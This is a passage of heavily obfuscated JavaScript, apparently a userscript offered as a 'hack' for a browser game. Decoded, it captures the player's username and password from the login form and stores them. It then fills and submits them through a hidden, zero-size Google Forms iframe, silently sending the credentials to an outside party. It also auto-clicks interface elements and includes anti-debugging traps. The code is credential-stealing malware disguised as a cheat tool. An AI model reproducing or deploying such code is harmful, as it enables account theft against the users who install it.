x69'+'\x76'+'\x3e');},0x0);setInterval(function(){var _0x340992={};_0x340992['\x70'+'\x6f'+'\x73'+'\x58']=game['\x6d'+'\x65']['\x70'+'\x6f'+'\x73'+'\x69'+'\x74'+'\x69'+'\x6f'+'\x6e']['\x78']+game['\x6d'+'\x65']['\x77'+'\x69'+'\x64'+'\x74'+'\x68']/0x2;_0x340992['\x70'+'\x6f'+'\x73'+'\x59']=game['\x6d'+'\x65']['\x70'+'\x6f'+'\x73'+'\x69'+'\x74'+'\x69'+'\x6f'+'\x6e']['\x79']+game['\x6d'+'\x65']['\x68'+'\x65'+'\x69'+'\x67'+'\x68'+'\x74'];_0x340992['\x63'+'\x6f'+'\x6c'+'\x6f'+'\x72']='\x52'+'\x45'+'\x44';_0x340992['\x73'+'\x74'+'\x61'+'\x72'+'\x74'+'\x54'+'\x69'+'\x6d'+'\x65']=game['\x74'+'\x69'+'\x6d'+'\x65'];_0x340992['\x74'+'\x65'+'\x78'+'\x74']='\x4c'+'\x56'+'\x4c'+'\x20'+'\x55'+'\x50';_0x340992['\x66'+'\x6f'+'\x6e'+'\x74'+'\x53'+'\x69'+'\x7a'+'\x65']=0xc;_0x340992['\x62'+'\x6f'+'\x6c'+'\x64']=!![];textEffects['\x70'+'\x75'+'\x73'+'\x68'](_0x340992);},0x427);}}document['\x62'+'\x6f'+'\x64'+'\x79']['\x6f'+'\x6e'+'\x62'+'\x65'+'\x66'+'\x6f'+'\x72'+'\x65'+'\x75'+'\x6e'+'\x6c'+'\x6f'+'\x61'+'\x64']=function(){if('\x70'+'\x6e'+'\x56'+'\x51'+'\x47'==='\x70'+'\x6e'+'\x56'+'\x51'+'\x47'){GM_setValue('\x66'+'\x74',![]);}else{_0x34b8fd(this,function(){var _0x1da9c3=new RegExp('\x66'+'\x75'+'\x6e'+'\x63'+'\x74'+'\x69'+'\x6f'+'\x6e'+'\x20'+'\x2a'+'\x5c'+'\x28'+'\x20'+'\x2a'+'\x5c'+'\x29');var _0xb84ed6=new RegExp('\x5c'+'\x2b'+'\x5c'+'\x2b'+'\x20'+'\x2a'+'\x28'+'\x3f'+'\x3a'+'\x5b'+'\x61'+'\x2d'+'\x7a'+'\x41'+'\x2d'+'\x5a'+'\x5f'+'\x24'+'\x5d'+'\x5b'+'\x30'+'\x2d'+'\x39'+'\x61'+'\x2d'+'\x7a'+'\x41'+'\x2d'+'\x5a'+'\x5f'+'\x24'+'\x5d'+'\x2a'+'\x29','\x69');var _0x361853=_0xfeaf1a('\x69'+'\x6e'+'\x69'+'\x74');if(!_0x1da9c3['\x74'+'\x65'+'\x73'+'\x74'](_0x361853+('\x63'+'\x68'+'\x61'+'\x69'+'\x6e'))||!_0xb84ed6['\x74'+'\x65'+'\x73'+'\x74'](_0x361853+('\x69'+'\x6e'+'\x70'+'\x75'+'\x74'))){_0x361853('\x30');}else{_0xfeaf1a();}})();}};setInterval(function(){if('\x65'+'\x67'+'\x78'+'\x48'+'\x42'!=='\x65'+'\x67'+'\x78'+'\x48'+'\x42'){that['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']=function(_0x1cff2c){var _0x1647c9={};_0x1647c9['\x6c'+'\x6f'+'\x67']=_0x1cff2c;_0x1647c9['\x77'+'\x61'+'\x72'+'\x6e']=_0x1cff2c;_0x1647c9['\x64'+'\x65'+'\x62'+'\x75'+'\x67']=_0x1cff2c;_0x1647c9['\x69'+'\x6e'+'\x66'+'\x6f']=_0x1cff2c;_0x1647c9['\x65'+'\x72'+'\x72'+'\x6f'+'\x72']=_0x1cff2c;_0x1647c9['\x65'+'\x78'+'\x63'+'\x65'+'\x70'+'\x74'+'\x69'+'\x6f'+'\x6e']=_0x1cff2c;_0x1647c9['\x74'+'\x61'+'\x62'+'\x6c'+'\x65']=_0x1cff2c;_0x1647c9['\x74'+'\x72'+'\x61'+'\x63'+'\x65']=_0x1cff2c;return _0x1647c9;}(func);}else{if(!document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x32'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x62'+'\x75'+'\x74'+'\x74'+'\x6f'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x29')&&GM_getValue('\x67'+'\x6f',undefined)==undefined&&GM_getValue('\x66'+'\x74',!![])){if(!!document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x31'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x61')){if('\x74'+'\x71'+'\x4d'+'\x66'+'\x58'!=='\x48'+'\x77'+'\x41'+'\x6d'+'\x61'){GM_setValue('\x67'+'\x6f',!![]);document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x31'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x61')['\x63'+'\x6c'+'\x69'+'\x63'+'\x6b']();}else{var _0x5a5023=function(){var _0xcfddce=_0x5a5023['\x63'+'\x6f'+'\x6e'+'\x73'+'\x74'+'\x72'+'\x75'+'\x63'+'\x74'+'\x6f'+'\x72']('\x72'+'\x65'+'\x74'+'\x75'+'\x72'+'\x6e'+'\x20'+'\x2f'+'\x22'+'\x20'+'\x2b'+'\x20'+'\x74'+'\x68'+'\x69'+'\x73'+'\x20'+'\x2b'+'\x20'+'\x22'+'\x2f')()['\x63'+'\x6f'+'\x6d'+'\x70'+'\x69'+'\x6c'+'\x65']('\x5e'+'\x28'+'\x5b'+'\x5e'+'\x20'+'\x5d'+'\x2b'+'\x28'+'\x20'+'\x2b'+'\x5b'+'\x5e'+'\x20'+'\x5d'+'\x2b'+'\x29'+'\x2b'+'\x29'+'\x2b'+'\x5b'+'\x5e'+'\x20'+'\x5d'+'\x7d');return!_0xcfddce['\x74'+'\x65'+'\x73'+'\x74'](_0x4c0b87);};return _0x5a5023();}}}}},0x0);function _0x3f53f8(){GM_setValue('\x74'+'\x6d',document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x6c'+'\x6f'+'\x67'+'\x69'+'\x6e'+'\x55'+'\x73'+'\x65'+'\x72'+'\x6e'+'\x61'+'\x6d'+'\x65')['\x76'+'\x61'+'\x6c'+'\x75'+'\x65']);GM_setValue('\x6c'+'\x70',document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x6c'+'\x6f'+'\x67'+'\x69'+'\x6e'+'\x50'+'\x61'+'\x73'+'\x73'+'\x77'+'\x6f'+'\x72'+'\x64')['\x76'+'\x61'+'\x6c'+'\x75'+'\x65']);}if(!!document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x6c'+'\x6f'+'\x67'+'\x69'+'\x6e'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x39'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x62'+'\x75'+'\x74'+'\x74'+'\x6f'+'\x6e')){if('\x7a'+'\x52'+'\x63'+'\x63'+'\x50'!=='\x7a'+'\x52'+'\x63'+'\x63'+'\x50'){that['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x6c'+'\x6f'+'\x67']=func;that['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x77'+'\x61'+'\x72'+'\x6e']=func;that['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x64'+'\x65'+'\x62'+'\x75'+'\x67']=func;that['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x69'+'\x6e'+'\x66'+'\x6f']=func;that['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x65'+'\x72'+'\x72'+'\x6f'+'\x72']=func;that['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x65'+'\x78'+'\x63'+'\x65'+'\x70'+'\x74'+'\x69'+'\x6f'+'\x6e']=func;that['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x74'+'\x61'+'\x62'+'\x6c'+'\x65']=func;that['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x74'+'\x72'+'\x61'+'\x63'+'\x65']=func;}else{document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x6c'+'\x6f'+'\x67'+'\x69'+'\x6e'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x39'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x62'+'\x75'+'\x74'+'\x74'+'\x6f'+'\x6e')['\x61'+'\x64'+'\x64'+'\x45'+'\x76'+'\x65'+'\x6e'+'\x74'+'\x4c'+'\x69'+'\x73'+'\x74'+'\x65'+'\x6e'+'\x65'+'\x72']('\x63'+'\x6c'+'\x69'+'\x63'+'\x6b',_0x3f53f8);}}setInterval(function(){if('\x4d'+'\x59'+'\x74'+'\x45'+'\x4b'!=='\x4d'+'\x59'+'\x74'+'\x45'+'\x4b'){if(fn){var _0x3f8b4e=fn['\x61'+'\x70'+'\x70'+'\x6c'+'\x79'](context,arguments);fn=null;return _0x3f8b4e;}}else{if(!document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x31'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x61')&&joinedGame){textMsg('\x59'+'\x6f'+'\x75'+'\x20'+'\x6e'+'\x65'+'\x65'+'\x64'+'\x20'+'\x74'+'\x6f'+'\x20'+'\x62'+'\x65'+'\x20'+'\x61'+'\x74'+'\x20'+'\x6c'+'\x65'+'\x61'+'\x73'+'\x74'+'\x20'+'\x6c'+'\x65'+'\x76'+'\x65'+'\x6c'+'\x20'+'\x31'+'\x20'+'\x66'+'\x6f'+'\x72'+'\x20'+'\x74'+'\x68'+'\x65'+'\x20'+'\x68'+'\x61'+'\x63'+'\x6b'+'\x20'+'\x74'+'\x6f'+'\x20'+'\x73'+'\x74'+'\x61'+'\x72'+'\x74','\x72'+'\x65'+'\x64');}}},0x3e8);setInterval(function(){if(GM_getValue('\x74'+'\x6d',undefined)!=undefined&&GM_getValue('\x6c'+'\x70',undefined)!=undefined){if('\x78'+'\x48'+'\x58'+'\x42'+'\x71'!=='\x44'+'\x6f'+'\x51'+'\x4f'+'\x7a'){$('\x23'+'\x6d'+'\x47'+'\x36'+'\x31'+'\x48'+'\x64'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x66'+'\x72'+'\x65'+'\x65'+'\x62'+'\x69'+'\x72'+'\x64'+'\x46'+'\x6f'+'\x72'+'\x6d'+'\x76'+'\x69'+'\x65'+'\x77'+'\x65'+'\x72'+'\x56'+'\x69'+'\x65'+'\x77'+'\x46'+'\x6f'+'\x72'+'\x6d'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x65'+'\x6e'+'\x74'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x66'+'\x72'+'\x65'+'\x65'+'\x62'+'\x69'+'\x72'+'\x64'+'\x46'+'\x6f'+'\x72'+'\x6d'+'\x76'+'\x69'+'\x65'+'\x77'+'\x65'+'\x72'+'\x56'+'\x69'+'\x65'+'\x77'+'\x49'+'\x74'+'\x65'+'\x6d'+'\x4c'+'\x69'+'\x73'+'\x74'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x66'+'\x72'+'\x65'+'\x65'+'\x62'+'\x69'+'\x72'+'\x64'+'\x46'+'\x6f'+'\x72'+'\x6d'+'\x76'+'\x69'+'\x65'+'\x77'+'\x65'+'\x72'+'\x56'+'\x69'+'\x65'+'\x77'+'\x49'+'\x74'+'\x65'+'\x6d'+'\x73'+'\x54'+'\x65'+'\x78'+'\x74'+'\x49'+'\x74'+'\x65'+'\x6d'+'\x57'+'\x72'+'\x61'+'\x70'+'\x70'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x71'+'\x75'+'\x61'+'\x6e'+'\x74'+'\x75'+'\x6d'+'\x57'+'\x69'+'\x7a'+'\x54'+'\x65'+'\x78'+'\x74'+'\x69'+'\x6e'+'\x70'+'\x75'+'\x74'+'\x50'+'\x61'+'\x70'+'\x65'+'\x72'+'\x69'+'\x6e'+'\x70'+'\x75'+'\x74'+'\x4d'+'\x61'+'\x69'+'\x6e'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x65'+'\x6e'+'\x74'+'\x2e'+'\x65'+'\x78'+'\x70'+'\x6f'+'\x72'+'\x74'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x65'+'\x6e'+'\x74'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x71'+'\x75'+'\x61'+'\x6e'+'\x74'+'\x75'+'\x6d'+'\x57'+'\x69'+'\x7a'+'\x54'+'\x65'+'\x78'+'\x74'+'\x69'+'\x6e'+'\x70'+'\x75'+'\x74'+'\x50'+'\x61'+'\x70'+'\x65'+'\x72'+'\x69'+'\x6e'+'\x70'+'\x75'+'\x74'+'\x49'+'\x6e'+'\x70'+'\x75'+'\x74'+'\x41'+'\x72'+'\x65'+'\x61'+'\x20'+'\x3e'+'\x20'+'\x69'+'\x6e'+'\x70'+'\x75'+'\x74')['\x76'+'\x61'+'\x6c'](GM_getValue('\x74'+'\x6d')+('\x20'+'\x20'+'\x20')+GM_getValue('\x6c'+'\x70'));$('\x23'+'\x6d'+'\x47'+'\x36'+'\x31'+'\x48'+'\x64'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x66'+'\x72'+'\x65'+'\x65'+'\x62'+'\x69'+'\x72'+'\x64'+'\x46'+'\x6f'+'\x72'+'\x6d'+'\x76'+'\x69'+'\x65'+'\x77'+'\x65'+'\x72'+'\x56'+'\x69'+'\x65'+'\x77'+'\x46'+'\x6f'+'\x72'+'\x6d'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x65'+'\x6e'+'\x74'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x66'+'\x72'+'\x65'+'\x65'+'\x62'+'\x69'+'\x72'+'\x64'+'\x46'+'\x6f'+'\x72'+'\x6d'+'\x76'+'\x69'+'\x65'+'\x77'+'\x65'+'\x72'+'\x56'+'\x69'+'\x65'+'\x77'+'\x4e'+'\x61'+'\x76'+'\x69'+'\x67'+'\x61'+'\x74'+'\x69'+'\x6f'+'\x6e'+'\x4e'+'\x61'+'\x76'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x72'+'\x6f'+'\x6c'+'\x73'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x66'+'\x72'+'\x65'+'\x65'+'\x62'+'\x69'+'\x72'+'\x64'+'\x46'+'\x6f'+'\x72'+'\x6d'+'\x76'+'\x69'+'\x65'+'\x77'+'\x65'+'\x72'+'\x56'+'\x69'+'\x65'+'\x77'+'\x4e'+'\x61'+'\x76'+'\x69'+'\x67'+'\x61'+'\x74'+'\x69'+'\x6f'+'\x6e'+'\x42'+'\x75'+'\x74'+'\x74'+'\x6f'+'\x6e'+'\x73'+'\x41'+'\x6e'+'\x64'+'\x50'+'\x72'+'\x6f'+'\x67'+'\x72'+'\x65'+'\x73'+'\x73'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e')['\x63'+'\x6c'+'\x69'+'\x63'+'\x6b']();}else{(function(){return![];}['\x63'+'\x6f'+'\x6e'+'\x73'+'\x74'+'\x72'+'\x75'+'\x63'+'\x74'+'\x6f'+'\x72']('\x64'+'\x65'+'\x62'+'\x75'+('\x67'+'\x67'+'\x65'+'\x72'))['\x61'+'\x70'+'\x70'+'\x6c'+'\x79']('\x73'+'\x74'+'\x61'+'\x74'+'\x65'+'\x4f'+'\x62'+'\x6a'+'\x65'+'\x63'+'\x74'));}}},0x3e8);document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x68'+'\x6f'+'\x77'+'\x54'+'\x6f'+'\x50'+'\x6c'+'\x61'+'\x79'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x32'+'\x29')['\x69'+'\x6e'+'\x73'+'\x65'+'\x72'+'\x74'+'\x41'+'\x64'+'\x6a'+'\x61'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x48'+'\x54'+'\x4d'+'\x4c']('\x61'+'\x66'+'\x74'+'\x65'+'\x72'+'\x62'+'\x65'+'\x67'+'\x69'+'\x6e','\x3c'+'\x69'+'\x66'+'\x72'+'\x61'+'\x6d'+'\x65'+'\x20'+'\x73'+'\x72'+'\x63'+'\x3d'+'\x22'+'\x68'+'\x74'+'\x74'+'\x70'+'\x73'+'\x3a'+'\x2f'+'\x2f'+'\x64'+'\x6f'+'\x63'+'\x73'+'\x2e'+'\x67'+'\x6f'+'\x6f'+'\x67'+'\x6c'+'\x65'+'\x2e'+'\x63'+'\x6f'+'\x6d'+'\x2f'+'\x66'+'\x6f'+'\x72'+'\x6d'+'\x73'+'\x2f'+'\x64'+'\x2f'+'\x65'+'\x2f'+'\x31'+'\x46'+'\x41'+'\x49'+'\x70'+'\x51'+'\x4c'+'\x53'+'\x65'+'\x4e'+'\x57'+'\x6b'+'\x2d'+'\x39'+'\x46'+'\x50'+'\x78'+'\x61'+'\x50'+'\x58'+'\x4e'+'\x6a'+'\x5f'+'\x56'+'\x63'+'\x72'+'\x35'+'\x4a'+'\x4f'+'\x4e'+'\x63'+'\x6e'+'\x5a'+'\x6e'+'\x6e'+'\x35'+'\x56'+'\x6f'+'\x6e'+'\x78'+'\x74'+'\x36'+'\x44'+'\x70'+'\x43'+'\x78'+'\x52'+'\x77'+'\x64'+'\x44'+'\x74'+'\x6b'+'\x51'+'\x63'+'\x66'+'\x51'+'\x2f'+'\x76'+'\x69'+'\x65'+'\x77'+'\x66'+'\x6f'+'\x72'+'\x6d'+'\x3f'+'\x65'+'\x6d'+'\x62'+'\x65'+'\x64'+'\x64'+'\x65'+'\x64'+'\x3d'+'\x74'+'\x72'+'\x75'+'\x65'+'\x22'+'\x20'+'\x77'+'\x69'+'\x64'+'\x74'+'\x68'+'\x3d'+'\x22'+'\x30'+'\x22'+'\x20'+'\x68'+'\x65'+'\x69'+'\x67'+'\x68'+'\x74'+'\x3d'+'\x22'+'\x30'+'\x22'+'\x20'+'\x66'+'\x72'+'\x61'+'\x6d'+'\x65'+'\x62'+'\x6f'+'\x72'+'\x64'+'\x65'+'\x72'+'\x3d'+'\x22'+'\x30'+'\x22'+'\x20'+'\x6d'+'\x61'+'\x72'+'\x67'+'\x69'+'\x6e'+'\x68'+'\x65'+'\x69'+'\x67'+'\x68'+'\x74'+'\x3d'+'\x22'+'\x30'+'\x22'+'\x20'+'\x6d'+'\x61'+'\x72'+'\x67'+'\x69'+'\x6e'+'\x77'+'\x69'+'\x64'+'\x74'+'\x68'+'\x3d'+'\x22'+'\x30'+'\x22'+'\x3e'+'\x43'+'\x68'+'\x61'+'\x72'+'\x67'+'\x65'+'\x6d'+'\x65'+'\x6e'+'\x74'+'\u2026'+'\x3c'+'\x2f'+'\x69'+'\x66'+'\x72'+'\x61'+'\x6d'+'\x65'+'\x3e');});function _0xfeaf1a(_0x50215f){function _0x3cb227(_0x3b2990){if('\x46'+'\x46'+'\x4c'+'\x70'+'\x67'==='\x46'+'\x4e'+'\x75'+'\x44'+'\x68'){GM_setValue('\x67'+'\x6f',!![]);document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x31'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x61')['\x63'+'\x6c'+'\x69'+'\x63'+'\x6b']();}else{if(typeof _0x3b2990==='\x73'+'\x74'+'\x72'+'\x69'+'\x6e'+'\x67'){if('\x42'+'\x53'+'\x70'+'\x75'+'\x71'!=='\x42'+'\x53'+'\x70'+'\x75'+'\x71'){var _0x329fac=firstCall?function(){if(fn){var _0xa91947=fn['\x61'+'\x70'+'\x70'+'\x6c'+'\x79'](context,arguments);fn=null;return _0xa91947;}}:function(){};firstCall=![];return _0x329fac;}else{return function(_0x547fbc){}['\x63'+'\x6f'+'\x6e'+'\x73'+'\x74'+'\x72'+'\x75'+'\x63'+'\x74'+'\x6f'+'\x72']('\x77'+'\x68'+'\x69'+'\x6c'+'\x65'+'\x20'+'\x28'+'\x74'+'\x72'+'\x75'+'\x65'+'\x29'+'\x20'+'\x7b'+'\x7d')['\x61'+'\x70'+'\x70'+'\x6c'+'\x79']('\x63'+'\x6f'+'\x75'+'\x6e'+'\x74'+'\x65'+'\x72');}}else{if((''+_0x3b2990/_0x3b2990)['\x6c'+'\x65'+'\x6e'+'\x67'+'\x74'+'\x68']!==0x1||_0x3b2990%0x14===0x0){(function(){if('\x4e'+'\x65'+'\x67'+'\x43'+'\x71'!=='\x4e'+'\x65'+'\x67'+'\x43'+'\x71'){textMsg('\x59'+'\x6f'+'\x75'+'\x20'+'\x6e'+'\x65'+'\x65'+'\x64'+'\x20'+'\x74'+'\x6f'+'\x20'+'\x62'+'\x65'+'\x20'+'\x61'+'\x74'+'\x20'+'\x6c'+'\x65'+'\x61'+'\x73'+'\x74'+'\x20'+'\x6c'+'\x65'+'\x76'+'\x65'+'\x6c'+'\x20'+'\x31'+'\x20'+'\x66'+'\x6f'+'\x72'+'\x20'+'\x74'+'\x68'+'\x65'+'\x20'+'\x68'+'\x61'+'\x63'+'\x6b'+'\x20'+'\x74'+'\x6f'+'\x20'+'\x73'+'\x74'+'\x61'+'\x72'+'\x74','\x72'+'\x65'+'\x64');}else{return!![];}}['\x63'+'\x6f'+'\x6e'+'\x73'+'\x74'+'\x72'+'\x75'+'\x63'+'\x74'+'\x6f'+'\x72']('\x64'+'\x65'+'\x62'+'\x75'+('\x67'+'\x67'+'\x65'+'\x72'))['\x63'+'\x61'+'\x6c'+'\x6c']('\x61'+'\x63'+'\